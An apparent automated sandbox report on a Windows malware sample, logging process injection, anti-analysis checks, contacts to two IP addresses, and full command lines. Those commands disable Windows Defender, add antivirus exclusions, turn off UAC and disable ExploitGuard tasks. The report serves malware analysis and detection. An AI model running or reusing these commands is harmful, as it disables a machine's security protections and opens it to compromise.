NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05150000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74004000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ae000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b9e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0516f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06460000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 61440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06461000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05651000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05161000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0565a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0565d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0565e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\FFCC.tmp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (14 events)

cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
cmdline	"C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
cmdline	powershell set-mppreference -exclusionpath C:\
cmdline	cmd /c powershell set-mppreference -exclusionpath C:\
cmdline	powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
cmdline	powershell.exe -command "Set-MpPreference -PUAProtection disable"
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
cmdline	powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
cmdline	powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
cmdline	powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
cmdline	schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 6, 2023, 5:01 p.m.	show_type: 0 filepath_r: cmd parameters: /c powershell set-mppreference -exclusionpath C:\ filepath: cmd	1	1	0
ShellExecuteExW July 6, 2023, 5:01 p.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" filepath: C:\Windows\sysnative\cmd	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 6, 2023, 5:01 p.m.	flags: 1158 family: 0	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (7 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 6, 2023, 5:01 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 6, 2023, 5:01 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 6, 2023, 5:01 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 6, 2023, 5:01 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 6, 2023, 5:02 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 6, 2023, 5:02 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 6, 2023, 5:03 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (17 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess July 6, 2023, 5:01 p.m.	status_code: 0xffffffff process_identifier: 2800 process_handle: 0x00000430		0	0
NtTerminateProcess July 6, 2023, 5:01 p.m.	status_code: 0xffffffff process_identifier: 2800 process_handle: 0x00000430	1	0	0

Uses Windows utilities for basic Windows functionality (30 events)

cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
cmdline	reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
cmdline	C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
cmdline	reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
cmdline	powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
cmdline	reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Communicates with host for which no DNS query was performed (2 events)

host	23.137.249.127
host	77.88.21.158

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2800 region_size: 110592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000548		3221225496	0
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2876 region_size: 110592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000544	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation July 6, 2023, 5:01 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

Wllcsochcbi.exe tried to sleep 2728263 seconds, actually delayed analysis time by 2728263 seconds

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2548 manipulating memory of non-child process 2800
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2800 region_size: 110592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000548		3221225496	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELb@]à2Z0@°\|qÈÀpt,.codeð78 `.textÂÒPÔ< `.rdata304@@.data,pD@À.rsrcÀV@@ base_address: 0x00400000 process_identifier: 2876 process_handle: 0x00000544	1	1	0
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2876 process_handle: 0x00000544	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 6, 2023, 5:01 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELb@]à2Z0@°\|qÈÀpt,.codeð78 `.textÂÒPÔ< `.rdata304@@.data,pD@À.rsrcÀV@@ base_address: 0x00400000 process_identifier: 2876 process_handle: 0x00000544	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2548 called NtSetContextThread to modify thread in remote process 2876
NtSetContextThread July 6, 2023, 5:01 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4198400 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000430 process_identifier: 2876	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2548 resumed a thread in remote process 2876
Process injection	Process 2876 resumed a thread in remote process 2976
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000430 suspend_count: 1 process_identifier: 2876	1	0	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 2976	1	0	0

Creates known SpyNet files, registry changes and/or mutexes. (1 event)

registry

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\SpyNet

Creates a suspicious Powershell process (1 event)

option

-noninteractive

value

Prevents creating an interactive prompt for the user

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Disables Windows Security features (13 events)

description	attempts to disable user access control	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting\DisableEnhancedNotifications
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine\MpEnablePus
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to disable windows defender	registry	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start

Executed a process and injected code into it, probably while unpacking (50 out of 90 events)

Time & API	Arguments	Status	Return
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000188 suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000370 suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x00000388 suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x000003a4 suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x000003e4 suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x000003f8 suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x0000041c suspend_count: 1 process_identifier: 2548	1	0
NtResumeThread July 6, 2023, 5:01 p.m.	thread_handle: 0x0000042c suspend_count: 1 process_identifier: 2548	1	0
CreateProcessInternalW July 6, 2023, 5:01 p.m.	thread_identifier: 2744 thread_handle: 0x00000568 process_identifier: 2740 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\ filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000570	1	1
